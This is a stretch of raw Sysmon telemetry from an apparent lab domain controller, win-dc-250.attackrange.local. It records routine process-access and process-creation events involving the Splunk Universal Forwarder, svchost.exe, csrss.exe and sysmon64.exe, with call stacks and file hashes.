AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006865Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:17.891{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-45C5-6000-B802-000000009A01}4408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006864Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:17.891{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006863Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:17.891{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006862Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:17.891{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006861Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:17.891{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006860Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:17.891{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006859Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:17.891{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006858Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:17.891{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006857Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:17.891{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006856Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:17.891{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006855Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:17.891{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45C5-6000-B802-000000009A01}4408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006854Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:17.891{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-45C5-6000-B802-000000009A01}4408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006853Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:17.751{08A6967A-45C5-6000-B802-000000009A01}4408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006880Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:18.703{08A6967A-45C6-6000-B902-000000009A01}28163552C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006879Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:18.562{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-45C6-6000-B902-000000009A01}2816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006878Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:18.562{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006877Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:18.562{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006876Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:18.562{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006875Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:18.562{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006874Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:18.562{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006873Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:18.562{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006872Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:18.562{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006871Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:18.562{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006870Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:18.562{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006869Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:18.562{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45C6-6000-B902-000000009A01}2816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006868Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:18.562{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-45C6-6000-B902-000000009A01}2816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006867Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:18.563{08A6967A-45C6-6000-B902-000000009A01}2816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 